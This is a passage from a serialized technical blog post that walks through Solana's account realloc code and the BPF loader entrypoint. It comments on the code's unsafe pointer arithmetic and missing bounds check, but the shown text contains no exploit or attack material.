new_len.saturating_sub(orig_len),\n );\n }\n\n Ok(())\n}\n",[20474],{"type":24,"tag":145,"props":20475,"children":20476},{"__ignoreMap":7},[20477,20570,20604,20611,20619,20631,20639,20731,20763,20770,20778,20908,20939,20946,20953,20961,20995,21007,21056,21068,21097,21104,21111,21118,21131],{"type":24,"tag":301,"props":20478,"children":20479},{"class":303,"line":304},[20480,20485,20490,20495,20499,20503,20508,20512,20517,20521,20526,20530,20535,20539,20543,20547,20551,20556,20561,20566],{"type":24,"tag":301,"props":20481,"children":20482},{"style":348},[20483],{"type":30,"value":20484},"pub",{"type":24,"tag":301,"props":20486,"children":20487},{"style":348},[20488],{"type":30,"value":20489}," fn",{"type":24,"tag":301,"props":20491,"children":20492},{"style":314},[20493],{"type":30,"value":20494}," realloc",{"type":24,"tag":301,"props":20496,"children":20497},{"style":359},[20498],{"type":30,"value":362},{"type":24,"tag":301,"props":20500,"children":20501},{"style":385},[20502],{"type":30,"value":556},{"type":24,"tag":301,"props":20504,"children":20505},{"style":348},[20506],{"type":30,"value":20507},"self",{"type":24,"tag":301,"props":20509,"children":20510},{"style":359},[20511],{"type":30,"value":377},{"type":24,"tag":301,"props":20513,"children":20514},{"style":369},[20515],{"type":30,"value":20516},"new_len",{"type":24,"tag":301,"props":20518,"children":20519},{"style":385},[20520],{"type":30,"value":1679},{"type":24,"tag":301,"props":20522,"children":20523},{"style":10246},[20524],{"type":30,"value":20525}," usize",{"type":24,"tag":301,"props":20527,"children":20528},{"style":359},[20529],{"type":30,"value":377},{"type":24,"tag":301,"props":20531,"children":20532},{"style":369},[20533],{"type":30,"value":20534},"zero_init",{"type":24,"tag":301,"props":20536,"children":20537},{"style":385},[20538],{"type":30,"value":1679},{"type":24,"tag":301,"props":20540,"children":20541},{"style":10246},[20542],{"type":30,"value":18848},{"type":24,"tag":301,"props":20544,"children":20545},{"style":359},[20546],{"type":30,"value":911},{"type":24,"tag":301,"props":20548,"children":20549},{"style":385},[20550],{"type":30,"value":882},{"type":24,"tag":301,"props":20552,"children":20553},{"style":10246},[20554],{"type":30,"value":20555}," Result",{"type":24,"tag":301,"props":20557,"children":20558},{"style":359},[20559],{"type":30,"value":20560},"\u003C(), ",{"type":24,"tag":301,"props":20562,"children":20563},{"style":10246},[20564],{"type":30,"value":20565},"ProgramError",{"type":24,"tag":301,"props":20567,"children":20568},{"style":359},[20569],{"type":30,"value":14097},{"type":24,"tag":301,"props":20571,"children":20572},{"class":303,"line":320},[20573,20577,20582,20586,20591,20595,20600],{"type":24,"tag":301,"props":20574,"children":20575},{"style":348},[20576],{"type":30,"value":9838},{"type":24,"tag":301,"props":20578,"children":20579},{"style":369},[20580],{"type":30,"value":20581}," orig_len",{"type":24,"tag":301,"props":20583,"children":20584},{"style":385},[20585],{"type":30,"value":2537},{"type":24,"tag":301,"props":20587,"children":20588},{"style":348},[20589],{"type":30,"value":20590}," self",{"type":24,"tag":301,"props":20592,"children":20593},{"style":385},[20594],{"type":30,"value":206},{"type":24,"tag":301,"props":20596,"children":20597},{"style":314},[20598],{"type":30,"value":20599},"data_len",{"type":24,"tag":301,"props":20601,"children":20602},{"style":359},[20603],{"type":30,"value":4859},{"type":24,"tag":301,"props":20605,"children":20606},{"class":303,"line":335},[20607],{"type":24,"tag":301,"props":20608,"children":20609},{"emptyLinePlaceholder":16},[20610],{"type":30,"value":341},{"type":24,"tag":301,"props":20612,"children":20613},{"class":303,"line":344},[20614],{"type":24,"tag":301,"props":20615,"children":20616},{"style":1062},[20617],{"type":30,"value":20618}," // realloc\n",{"type":24,"tag":301,"props":20620,"children":20621},{"class":303,"line":401},[20622,20627],{"type":24,"tag":301,"props":20623,"children":20624},{"style":348},[20625],{"type":30,"value":20626}," unsafe",{"type":24,"tag":301,"props":20628,"children":20629},{"style":359},[20630],{"type":30,"value":3035},{"type":24,"tag":301,"props":20632,"children":20633},{"class":303,"line":415},[20634],{"type":24,"tag":301,"props":20635,"children":20636},{"style":1062},[20637],{"type":30,"value":20638}," // First set new length in the serialized data\n",{"type":24,"tag":301,"props":20640,"children":20641},{"class":303,"line":439},[20642,20646,20651,20655,20659,20663,20668,20673,20677,20682,20686,20690,20695,20699,20703,20707,20711,20715,20719,20723,20727],{"type":24,"tag":301,"props":20643,"children":20644},{"style":348},[20645],{"type":30,"value":9900},{"type":24,"tag":301,"props":20647,"children":20648},{"style":369},[20649],{"type":30,"value":20650}," ptr",{"type":24,"tag":301,"props":20652,"children":20653},{"style":385},[20654],{"type":30,"value":2537},{"type":24,"tag":301,"props":20656,"children":20657},{"style":348},[20658],{"type":30,"value":20590},{"type":24,"tag":301,"props":20660,"children":20661},{"style":385},[20662],{"type":30,"value":206},{"type":24,"tag":301,"props":20664,"children":20665},{"style":314},[20666],{"type":30,"value":20667},"try_borrow_mut_data",{"type":24,"tag":301,"props":20669,"children":20670},{"style":359},[20671],{"type":30,"value":20672},"()",{"type":24,"tag":301,"props":20674,"children":20675},{"style":385},[20676],{"type":30,"value":9966},{"type":24,"tag":301,"props":20678,"children":20679},{"style":314},[20680],{"type":30,"value":20681},"as_mut_ptr",{"type":24,"tag":301,"props":20683,"children":20684},{"style":359},[20685],{"type":30,"value":20672},{"type":24,"tag":301,"props":20687,"children":20688},{"style":385},[20689],{"type":30,"value":206},{"type":24,"tag":301,"props":20691,"children":20692},{"style":314},[20693],{"type":30,"value":20694},"offset",{"type":24,"tag":301,"props":20696,"children":20697},{"style":359},[20698],{"type":30,"value":362},{"type":24,"tag":301,"props":20700,"children":20701},{"style":385},[20702],{"type":30,"value":9253},{"type":24,"tag":301,"props":20704,"children":20705},{"style":466},[20706],{"type":30,"value":10900},{"type":24,"tag":301,"props":20708,"children":20709},{"style":359},[20710],{"type":30,"value":911},{"type":24,"tag":301,"props":20712,"children":20713},{"style":348},[20714],{"type":30,"value":15654},{"type":24,"tag":301,"props":20716,"children":20717},{"style":385},[20718],{"type":30,"value":431},{"type":24,"tag":301,"props":20720,"children":20721},{"style":348},[20722],{"type":30,"value":10550},{"type":24,"tag":301,"props":20724,"children":20725},{"style":10246},[20726],{"type":30,"value":12680},{"type":24,"tag":301,"props":20728,"children":20729},{"style":359},[20730],{"type":30,"value":492},{"type":24,"tag":301,"props":20732,"children":20733},{"class":303,"line":447},[20734,20738,20742,20746,20751,20755,20759],{"type":24,"tag":301,"props":20735,"children":20736},{"style":385},[20737],{"type":30,"value":14567},{"type":24,"tag":301,"props":20739,"children":20740},{"style":369},[20741],{"type":30,"value":3137},{"type":24,"tag":301,"props":20743,"children":20744},{"style":385},[20745],{"type":30,"value":2537},{"type":24,"tag":301,"props":20747,"children":20748},{"style":369},[20749],{"type":30,"value":20750}," new_len",{"type":24,"tag":301,"props":20752,"children":20753},{"style":348},[20754],{"type":30,"value":15640},{"type":24,"tag":301,"props":20756,"children":20757},{"style":10246},[20758],{"type":30,"value":12680},{"type":24,"tag":301,"props":20760,"children":20761},{"style":359},[20762],{"type":30,"value":492},{"type":24,"tag":301,"props":20764,"children":20765},{"class":303,"line":476},[20766],{"type":24,"tag":301,"props":20767,"children":20768},{"emptyLinePlaceholder":16},[20769],{"type":30,"value":341},{"type":24,"tag":301,"props":20771,"children":20772},{"class":303,"line":495},[20773],{"type":24,"tag":301,"props":20774,"children":20775},{"style":1062},[20776],{"type":30,"value":20777}," // Then set the new length in the local slice\n",{"type":24,"tag":301,"props":20779,"children":20780},{"class":303,"line":504},[20781,20785,20789,20793,20797,20801,20805,20810,20814,20818,20822,20826,20831,20836,20840,20844,20848,20852,20856,20860,20864,20868,20872,20876,20880,20884,20888,20892,20896,20900,20904],{"type":24,"tag":301,"props":20782,"children":20783},{"style":348},[20784],{"type":30,"value":9900},{"type":24,"tag":301,"props":20786,"children":20787},{"style":369},[20788],{"type":30,"value":20650},{"type":24,"tag":301,"props":20790,"children":20791},{"style":385},[20792],{"type":30,"value":2537},{"type":24,"tag":301,"props":20794,"children":20795},{"style":385},[20796],{"type":30,"value":991},{"type":24,"tag":301,"props":20798,"children":20799},{"style":348},[20800],{"type":30,"value":10550},{"type":24,"tag":301,"props":20802,"children":20803},{"style":385},[20804],{"type":30,"value":431},{"type":24,"tag":301,"props":20806,"children":20807},{"style":359},[20808],{"type":30,"value":20809},"(((",{"type":24,"tag":301,"props":20811,"children":20812},{"style":348},[20813],{"type":30,"value":20507},{"type":24,"tag":301,"props":20815,"children":20816},{"style":385},[20817],{"type":30,"value":206},{"type":24,"tag":301,"props":20819,"children":20820},{"style":359},[20821],{"type":30,"value":10528},{"type":24,"tag":301,"props":20823,"children":20824},{"style":385},[20825],{"type":30,"value":206},{"type":24,"tag":301,"props":20827,"children":20828},{"style":314},[20829],{"type":30,"value":20830},"as_ptr",{"type":24,"tag":301,"props":20832,"children":20833},{"style":359},[20834],{"type":30,"value":20835},"() ",{"type":24,"tag":301,"props":20837,"children":20838},{"style":348},[20839],{"type":30,"value":15654},{"type":24,"tag":301,"props":20841,"children":20842},{"style":385},[20843],{"type":30,"value":431},{"type":24,"tag":301,"props":20845,"children":20846},{"style":348},[20847],{"type":30,"value":16460},{"type":24,"tag":301,"props":20849,"children":20850},{"style":10246},[20851],{"type":30,"value":12680},{"type":24,"tag":301,"props":20853,"children":20854},{"style":359},[20855],{"type":30,"value":9961},{"type":24,"tag":301,"props":20857,"children":20858},{"style":385},[20859],{"type":30,"value":206},{"type":24,"tag":301,"props":20861,"children":20862},{"style":314},[20863],{"type":30,"value":20694},{"type":24,"tag":301,"props":20865,"children":20866},{"style":359},[20867],{"type":30,"value":362},{"type":24,"tag":301,"props":20869,"children":20870},{"style":466},[20871],{"type":30,"value":546},{"type":24,"tag":301,"props":20873,"children":20874},{"style":359},[20875],{"type":30,"value":911},{"type":24,"tag":301,"props":20877,"children":20878},{"style":348},[20879],{"type":30,"value":15654},{"type":24,"tag":301,"props":20881,"children":20882},{"style":10246},[20883],{"type":30,"value":12680},{"type":24,"tag":301,"props":20885,"children":20886},{"style":359},[20887],{"type":30,"value":911},{"type":24,"tag":301,"props":20889,"children":20890},{"style":348},[20891],{"type":30,"value":15654},{"type":24,"tag":301,"props":20893,"children":20894},{"style":385},[20895],{"type":30,"value":431},{"type":24,"tag":301,"props":20897,"children":20898},{"style":348},[20899],{"type":30,"value":10550},{"type":24,"tag":301,"props":20901,"children":20902},{"style":10246},[20903],{"type":30,"value":12680},{"type":24,"tag":301,"props":20905,"children":20906},{"style":359},[20907],{"type":30,"value":589},{"type":24,"tag":301,"props":20909,"children":20910},{"class":303,"line":512},[20911,20915,20919,20923,20927,20931,20935],{"type":24,"tag":301,"props":20912,"children":20913},{"style":385},[20914],{"type":30,"value":14567},{"type":24,"tag":301,"props":20916,"children":20917},{"style":369},[20918],{"type":30,"value":3137},{"type":24,"tag":301,"props":20920,"children":20921},{"style":385},[20922],{"type":30,"value":2537},{"type":24,"tag":301,"props":20924,"children":20925},{"style":369},[20926],{"type":30,"value":20750},{"type":24,"tag":301,"props":20928,"children":20929},{"style":348},[20930],{"type":30,"value":15640},{"type":24,"tag":301,"props":20932,"children":20933},{"style":10246},[20934],{"type":30,"value":12680},{"type":24,"tag":301,"props":20936,"children":20937},{"style":359},[20938],{"type":30,"value":492},{"type":24,"tag":301,"props":20940,"children":20941},{"class":303,"line":592},[20942],{"type":24,"tag":301,"props":20943,"children":20944},{"style":359},[20945],{"type":30,"value":501},{"type":24,"tag":301,"props":20947,"children":20948},{"class":303,"line":619},[20949],{"type":24,"tag":301,"props":20950,"children":20951},{"emptyLinePlaceholder":16},[20952],{"type":30,"value":341},{"type":24,"tag":301,"props":20954,"children":20955},{"class":303,"line":635},[20956],{"type":24,"tag":301,"props":20957,"children":20958},{"style":1062},[20959],{"type":30,"value":20960}," // zero-init if requested\n",{"type":24,"tag":301,"props":20962,"children":20963},{"class":303,"line":643},[20964,20968,20973,20978,20982,20987,20991],{"type":24,"tag":301,"props":20965,"children":20966},{"style":308},[20967],{"type":30,"value":453},{"type":24,"tag":301,"props":20969,"children":20970},{"style":369},[20971],{"type":30,"value":20972}," zero_init",{"type":24,"tag":301,"props":20974,"children":20975},{"style":385},[20976],{"type":30,"value":20977}," &&",{"type":24,"tag":301,"props":20979,"children":20980},{"style":369},[20981],{"type":30,"value":20750},{"type":24,"tag":301,"props":20983,"children":20984},{"style":385},[20985],{"type":30,"value":20986}," >",{"type":24,"tag":301,"props":20988,"children":20989},{"style":369},[20990],{"type":30,"value":20581},{"type":24,"tag":301,"props":20992,"children":20993},{"style":359},[20994],{"type":30,"value":3035},{"type":24,"tag":301,"props":20996,"children":20997},{"class":303,"line":652},[20998,21003],{"type":24,"tag":301,"props":20999,"children":21000},{"style":314},[21001],{"type":30,"value":21002}," sol_memset",{"type":24,"tag":301,"props":21004,"children":21005},{"style":359},[21006],{"type":30,"value":1707},{"type":24,"tag":301,"props":21008,"children":21009},{"class":303,"line":666},[21010,21014,21018,21022,21026,21030,21034,21038,21042,21047,21051],{"type":24,"tag":301,"props":21011,"children":21012},{"style":385},[21013],{"type":30,"value":14500},{"type":24,"tag":301,"props":21015,"children":21016},{"style":348},[21017],{"type":30,"value":10550},{"type":24,"tag":301,"props":21019,"children":21020},{"style":348},[21021],{"type":30,"value":20590},{"type":24,"tag":301,"props":21023,"children":21024},{"style":385},[21025],{"type":30,"value":206},{"type":24,"tag":301,"props":21027,"children":21028},{"style":314},[21029],{"type":30,"value":20667},{"type":24,"tag":301,"props":21031,"children":21032},{"style":359},[21033],{"type":30,"value":20672},{"type":24,"tag":301,"props":21035,"children":21036},{"style":385},[21037],{"type":30,"value":2003},{"type":24,"tag":301,"props":21039,"children":21040},{"style":359},[21041],{"type":30,"value":541},{"type":24,"tag":301,"props":21043,"children":21044},{"style":369},[21045],{"type":30,"value":21046},"orig_len",{"type":24,"tag":301,"props":21048,"children":21049},{"style":385},[21050],{"type":30,"value":9887},{"type":24,"tag":301,"props":21052,"children":21053},{"style":359},[21054],{"type":30,"value":21055},"],\n",{"type":24,"tag":301,"props":21057,"children":21058},{"class":303,"line":674},[21059,21064],{"type":24,"tag":301,"props":21060,"children":21061},{"style":466},[21062],{"type":30,"value":21063}," 0",{"type":24,"tag":301,"props":21065,"children":21066},{"style":359},[21067],{"type":30,"value":1729},{"type":24,"tag":301,"props":21069,"children":21070},{"class":303,"line":692},[21071,21076,21080,21085,21089,21093],{"type":24,"tag":301,"props":21072,"children":21073},{"style":369},[21074],{"type":30,"value":21075}," new_len",{"type":24,"tag":301,"props":21077,"children":21078},{"style":385},[21079],{"type":30,"value":206},{"type":24,"tag":301,"props":21081,"children":21082},{"style":314},[21083],{"type":30,"value":21084},"saturating_sub",{"type":24,"tag":301,"props":21086,"children":21087},{"style":359},[21088],{"type":30,"value":362},{"type":24,"tag":301,"props":21090,"children":21091},{"style":369},[21092],{"type":30,"value":21046},{"type":24,"tag":301,"props":21094,"children":21095},{"style":359},[21096],{"type":30,"value":4656},{"type":24,"tag":301,"props":21098,"children":21099},{"class":303,"line":3631},[21100],{"type":24,"tag":301,"props":21101,"children":21102},{"style":359},[21103],{"type":30,"value":14559},{"type":24,"tag":301,"props":21105,"children":21106},{"class":303,"line":3639},[21107],{"type":24,"tag":301,"props":21108,"children":21109},{"style":359},[21110],{"type":30,"value":501},{"type":24,"tag":301,"props":21112,"children":21113},{"class":303,"line":3647},[21114],{"type":24,"tag":301,"props":21115,"children":21116},{"emptyLinePlaceholder":16},[21117],{"type":30,"value":341},{"type":24,"tag":301,"props":21119,"children":21120},{"class":303,"line":3685},[21121,21126],{"type":24,"tag":301,"props":21122,"children":21123},{"style":10246},[21124],{"type":30,"value":21125}," Ok",{"type":24,"tag":301,"props":21127,"children":21128},{"style":359},[21129],{"type":30,"value":21130},"(())\n",{"type":24,"tag":301,"props":21132,"children":21133},{"class":303,"line":3713},[21134],{"type":24,"tag":301,"props":21135,"children":21136},{"style":359},[21137],{"type":30,"value":698},{"type":24,"tag":32,"props":21139,"children":21140},{},[21141,21143,21149,21151,21156],{"type":30,"value":21142},"Oh. There's ",{"type":24,"tag":145,"props":21144,"children":21146},{"className":21145},[],[21147],{"type":30,"value":21148},"unsafe",{"type":30,"value":21150},". And no bounds check in sight. ",{"type":24,"tag":5422,"props":21152,"children":21153},{},[21154],{"type":30,"value":21155},"And",{"type":30,"value":21157}," pointer math. That doesn't look promising...",{"type":24,"tag":43,"props":21159,"children":21161},{"id":21160},"breaking-down-realloc",[21162,21164],{"type":30,"value":21163},"Breaking down ",{"type":24,"tag":145,"props":21165,"children":21167},{"className":21166},[],[21168],{"type":30,"value":20432},{"type":24,"tag":32,"props":21170,"children":21171},{},[21172,21174,21179],{"type":30,"value":21173},"Let's pick apart this ",{"type":24,"tag":145,"props":21175,"children":21177},{"className":21176},[],[21178],{"type":30,"value":21148},{"type":30,"value":21180}," block, since there's a lot going on here.",{"type":24,"tag":291,"props":21182,"children":21184},{"className":9818,"code":21183,"language":9817,"meta":7,"style":7},"// First set new length in the serialized data\nlet ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n*ptr = new_len as u64;\n",[21185],{"type":24,"tag":145,"props":21186,"children":21187},{"__ignoreMap":7},[21188,21196,21283],{"type":24,"tag":301,"props":21189,"children":21190},{"class":303,"line":304},[21191],{"type":24,"tag":301,"props":21192,"children":21193},{"style":1062},[21194],{"type":30,"value":21195},"// First set new length in the serialized data\n",{"type":24,"tag":301,"props":21197,"children":21198},{"class":303,"line":320},[21199,21203,21207,21211,21215,21219,21223,21227,21231,21235,21239,21243,21247,21251,21255,21259,21263,21267,21271,21275,21279],{"type":24,"tag":301,"props":21200,"children":21201},{"style":348},[21202],{"type":30,"value":3258},{"type":24,"tag":301,"props":21204,"children":21205},{"style":369},[21206],{"type":30,"value":20650},{"type":24,"tag":301,"props":21208,"children":21209},{"style":385},[21210],{"type":30,"value":2537},{"type":24,"tag":301,"props":21212,"children":21213},{"style":348},[21214],{"type":30,"value":20590},{"type":24,"tag":301,"props":21216,"children":21217},{"style":385},[21218],{"type":30,"value":206},{"type":24,"tag":301,"props":21220,"children":21221},{"style":314},[21222],{"type":30,"value":20667},{"type":24,"tag":301,"props":21224,"children":21225},{"style":359},[21226],{"type":30,"value":20672},{"type":24,"tag":301,"props":21228,"children":21229},{"style":385},[21230],{"type":30,"value":9966},{"type":24,"tag":301,"props":21232,"children":21233},{"style":314},[21234],{"type":30,"value":20681},{"type":24,"tag":301,"props":21236,"children":21237},{"style":359},[21238],{"type":30,"value":20672},{"type":24,"tag":301,"props":21240,"children":21241},{"style":385},[21242],{"type":30,"value":206},{"type":24,"tag":301,"props":21244,"children":21245},{"style":314},[21246],{"type":30,"value":20694},{"type":24,"tag":301,"props":21248,"children":21249},{"style":359},[21250],{"type":30,"value":362},{"type":24,"tag":301,"props":21252,"children":21253},{"style":385},[21254],{"type":30,"value":9253},{"type":24,"tag":301,"props":21256,"children":21257},{"style":466},[21258],{"type":30,"value":10900},{"type":24,"tag":301,"props":21260,"children":21261},{"style":359},[21262],{"type":30,"value":911},{"type":24,"tag":301,"props":21264,"children":21265},{"style":348},[21266],{"type":30,"value":15654},{"type":24,"tag":301,"props":21268,"children":21269},{"style":385},[21270],{"type":30,"value":431},{"type":24,"tag":301,"props":21272,"children":21273},{"style":348},[21274],{"type":30,"value":10550},{"type":24,"tag":301,"props":21276,"children":21277},{"style":10246},[21278],{"type":30,"value":12680},{"type":24,"tag":301,"props":21280,"children":21281},{"style":359},[21282],{"type":30,"value":492},{"type":24,"tag":301,"props":21284,"children":21285},{"class":303,"line":335},[21286,21290,21294,21298,21302,21306,21310],{"type":24,"tag":301,"props":21287,"children":21288},{"style":385},[21289],{"type":30,"value":772},{"type":24,"tag":301,"props":21291,"children":21292},{"style":369},[21293],{"type":30,"value":3137},{"type":24,"tag":301,"props":21295,"children":21296},{"style":385},[21297],{"type":30,"value":2537},{"type":24,"tag":301,"props":21299,"children":21300},{"style":369},[21301],{"type":30,"value":20750},{"type":24,"tag":301,"props":21303,"children":21304},{"style":348},[21305],{"type":30,"value":15640},{"type":24,"tag":301,"props":21307,"children":21308},{"style":10246},[21309],{"type":30,"value":12680},{"type":24,"tag":301,"props":21311,"children":21312},{"style":359},[21313],{"type":30,"value":492},{"type":24,"tag":32,"props":21315,"children":21316},{},[21317,21322],{"type":24,"tag":145,"props":21318,"children":21320},{"className":21319},[],[21321],{"type":30,"value":20667},{"type":30,"value":21323}," returns a mutable reference to the underlying buffer holding the data of the account. Normally in the course of contract execution, this comes from the serialized buffer passed into the contract by the BPF loader. So before we can understand the details here, let's take a quick detour...",{"type":24,"tag":80,"props":21325,"children":21327},{"id":21326},"bpf-loader-abi",[21328],{"type":30,"value":21329},"BPF Loader ABI",{"type":24,"tag":32,"props":21331,"children":21332},{},[21333,21335,21340,21342,21355],{"type":30,"value":21334},"Solana smart contracts have one job: interact with on-chain accounts. So what's the interface between the contract and the rest of the chain? To answer that, we're going to take a look at ",{"type":24,"tag":145,"props":21336,"children":21338},{"className":21337},[],[21339],{"type":30,"value":20447},{"type":30,"value":21341},"'s entrypoint code - the code that's added when you use the ",{"type":24,"tag":188,"props":21343,"children":21346},{"href":21344,"rel":21345},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#116-131",[192],[21347,21353],{"type":24,"tag":145,"props":21348,"children":21350},{"className":21349},[],[21351],{"type":30,"value":21352},"entrypoint!",{"type":30,"value":21354}," macro",{"type":30,"value":1679},{"type":24,"tag":291,"props":21357,"children":21359},{"className":9818,"code":21358,"language":9817,"meta":7,"style":7},"#[no_mangle]\npub unsafe extern \"C\" fn entrypoint(input: *mut u8) -> u64 {\n let (program_id, accounts, instruction_data) =\n unsafe { $crate::entrypoint::deserialize(input) };\n match $process_instruction(&program_id, &accounts, &instruction_data) {\n Ok(()) => $crate::entrypoint::SUCCESS,\n Err(error) => error.into(),\n }\n}\n",[21360],{"type":24,"tag":145,"props":21361,"children":21362},{"__ignoreMap":7},[21363,21371,21443,21486,21538,21596,21638,21681,21688],{"type":24,"tag":301,"props":21364,"children":21365},{"class":303,"line":304},[21366],{"type":24,"tag":301,"props":21367,"children":21368},{"style":359},[21369],{"type":30,"value":21370},"#[no_mangle]\n",{"type":24,"tag":301,"props":21372,"children":21373},{"class":303,"line":320},[21374,21378,21383,21388,21393,21397,21402,21406,21410,21414,21418,21422,21427,21431,21435,21439],{"type":24,"tag":301,"props":21375,"children":21376},{"style":348},[21377],{"type":30,"value":20484},{"type":24,"tag":301,"props":21379,"children":21380},{"style":348},[21381],{"type":30,"value":21382}," unsafe",{"type":24,"tag":301,"props":21384,"children":21385},{"style":348},[21386],{"type":30,"value":21387}," extern",{"type":24,"tag":301,"props":21389,"children":21390},{"style":329},[21391],{"type":30,"value":21392}," \"C\"",{"type":24,"tag":301,"props":21394,"children":21395},{"style":348},[21396],{"type":30,"value":20489},{"type":24,"tag":301,"props":21398,"children":21399},{"style":314},[21400],{"type":30,"value":21401}," entrypoint",{"type":24,"tag":301,"props":21403,"children":21404},{"style":359},[21405],{"type":30,"value":362},{"type":24,"tag":301,"props":21407,"children":21408},{"style":369},[21409],{"type":30,"value":15181},{"type":24,"tag":301,"props":21411,"children":21412},{"style":385},[21413],{"type":30,"value":1679},{"type":24,"tag":301,"props":21415,"children":21416},{"style":385},[21417],{"type":30,"value":431},{"type":24,"tag":301,"props":21419,"children":21420},{"style":348},[21421],{"type":30,"value":10550},{"type":24,"tag":301,"props":21423,"children":21424},{"style":10246},[21425],{"type":30,"value":21426}," u8",{"type":24,"tag":301,"props":21428,"children":21429},{"style":359},[21430],{"type":30,"value":911},{"type":24,"tag":301,"props":21432,"children":21433},{"style":385},[21434],{"type":30,"value":882},{"type":24,"tag":301,"props":21436,"children":21437},{"style":10246},[21438],{"type":30,"value":12680},{"type":24,"tag":301,"props":21440,"children":21441},{"style":359},[21442],{"type":30,"value":3035},{"type":24,"tag":301,"props":21444,"children":21445},{"class":303,"line":335},[21446,21450,21454,21459,21463,21468,21472,21477,21481],{"type":24,"tag":301,"props":21447,"children":21448},{"style":348},[21449],{"type":30,"value":9838},{"type":24,"tag":301,"props":21451,"children":21452},{"style":359},[21453],{"type":30,"value":873},{"type":24,"tag":301,"props":21455,"children":21456},{"style":369},[21457],{"type":30,"value":21458},"program_id",{"type":24,"tag":301,"props":21460,"children":21461},{"style":359},[21462],{"type":30,"value":377},{"type":24,"tag":301,"props":21464,"children":21465},{"style":369},[21466],{"type":30,"value":21467},"accounts",{"type":24,"tag":301,"props":21469,"children":21470},{"style":359},[21471],{"type":30,"value":377},{"type":24,"tag":301,"props":21473,"children":21474},{"style":369},[21475],{"type":30,"value":21476},"instruction_data",{"type":24,"tag":301,"props":21478,"children":21479},{"style":359},[21480],{"type":30,"value":911},{"type":24,"tag":301,"props":21482,"children":21483},{"style":385},[21484],{"type":30,"value":21485},"=\n",{"type":24,"tag":301,"props":21487,"children":21488},{"class":303,"line":344},[21489,21494,21498,21502,21507,21511,21516,21520,21525,21529,21533],{"type":24,"tag":301,"props":21490,"children":21491},{"style":348},[21492],{"type":30,"value":21493}," unsafe",{"type":24,"tag":301,"props":21495,"children":21496},{"style":359},[21497],{"type":30,"value":16392},{"type":24,"tag":301,"props":21499,"children":21500},{"style":385},[21501],{"type":30,"value":17093},{"type":24,"tag":301,"props":21503,"children":21504},{"style":348},[21505],{"type":30,"value":21506},"crate",{"type":24,"tag":301,"props":21508,"children":21509},{"style":385},[21510],{"type":30,"value":10308},{"type":24,"tag":301,"props":21512,"children":21513},{"style":359},[21514],{"type":30,"value":21515},"entrypoint",{"type":24,"tag":301,"props":21517,"children":21518},{"style":385},[21519],{"type":30,"value":10308},{"type":24,"tag":301,"props":21521,"children":21522},{"style":314},[21523],{"type":30,"value":21524},"deserialize",{"type":24,"tag":301,"props":21526,"children":21527},{"style":359},[21528],{"type":30,"value":362},{"type":24,"tag":301,"props":21530,"children":21531},{"style":369},[21532],{"type":30,"value":15181},{"type":24,"tag":301,"props":21534,"children":21535},{"style":359},[21536],{"type":30,"value":21537},") };\n",{"type":24,"tag":301,"props":21539,"children":21540},{"class":303,"line":401},[21541,21546,21551,21556,21560,21564,21568,21572,21576,21580,21584,21588,21592],{"type":24,"tag":301,"props":21542,"children":21543},{"style":308},[21544],{"type":30,"value":21545}," match",{"type":24,"tag":301,"props":21547,"children":21548},{"style":385},[21549],{"type":30,"value":21550}," $",{"type":24,"tag":301,"props":21552,"children":21553},{"style":369},[21554],{"type":30,"value":21555},"process_instruction",{"type":24,"tag":301,"props":21557,"children":21558},{"style":359},[21559],{"type":30,"value":362},{"type":24,"tag":301,"props":21561,"children":21562},{"style":385},[21563],{"type":30,"value":556},{"type":24,"tag":301,"props":21565,"children":21566},{"style":369},[21567],{"type":30,"value":21458},{"type":24,"tag":301,"props":21569,"children":21570},{"style":359},[21571],{"type":30,"value":377},{"type":24,"tag":301,"props":21573,"children":21574},{"style":385},[21575],{"type":30,"value":556},{"type":24,"tag":301,"props":21577,"children":21578},{"style":369},[21579],{"type":30,"value":21467},{"type":24,"tag":301,"props":21581,"children":21582},{"style":359},[21583],{"type":30,"value":377},{"type":24,"tag":301,"props":21585,"children":21586},{"style":385},[21587],{"type":30,"value":556},{"type":24,"tag":301,"props":21589,"children":21590},{"style":369},[21591],{"type":30,"value":21476},{"type":24,"tag":301,"props":21593,"children":21594},{"style":359},[21595],{"type":30,"value":398},{"type":24,"tag":301,"props":21597,"children":21598},{"class":303,"line":415},[21599,21604,21609,21613,21617,21621,21625,21629,21633],{"type":24,"tag":301,"props":21600,"children":21601},{"style":10246},[21602],{"type":30,"value":21603}," Ok",{"type":24,"tag":301,"props":21605,"children":21606},{"style":359},[21607],{"type":30,"value":21608},"(()) ",{"type":24,"tag":301,"props":21610,"children":21611},{"style":385},[21612],{"type":30,"value":4841},{"type":24,"tag":301,"props":21614,"children":21615},{"style":385},[21616],{"type":30,"value":21550},{"type":24,"tag":301,"props":21618,"children":21619},{"style":348},[21620],{"type":30,"value":21506},{"type":24,"tag":301,"props":21622,"children":21623},{"style":385},[21624],{"type":30,"value":10308},{"type":24,"tag":301,"props":21626,"children":21627},{"style":359},[21628],{"type":30,"value":21515},{"type":24,"tag":301,"props":21630,"children":21631},{"style":385},[21632],{"type":30,"value":10308},{"type":24,"tag":301,"props":21634,"children":21635},{"style":359},[21636],{"type":30,"value":21637},"SUCCESS,\n",{"type":24,"tag":301,"props":21639,"children":21640},{"class":303,"line":439},[21641,21646,21650,21655,21659,21663,21668,21672,21677],{"type":24,"tag":301,"props":21642,"children":21643},{"style":10246},[21644],{"type":30,"value":21645}," Err",{"type":24,"tag":301,"props":21647,"children":21648},{"style":359},[21649],{"type":30,"value":362},{"type":24,"tag":301,"props":21651,"children":21652},{"style":369},[21653],{"type":30,"value":21654},"error",{"type":24,"tag":301,"props":21656,"children":21657},{"style":359},[21658],{"type":30,"value":911},{"type":24,"tag":301,"props":21660,"children":21661},{"style":385},[21662],{"type":30,"value":4841},{"type":24,"tag":301,"props":21664,"children":21665},{"style":369},[21666],{"type":30,"value":21667}," 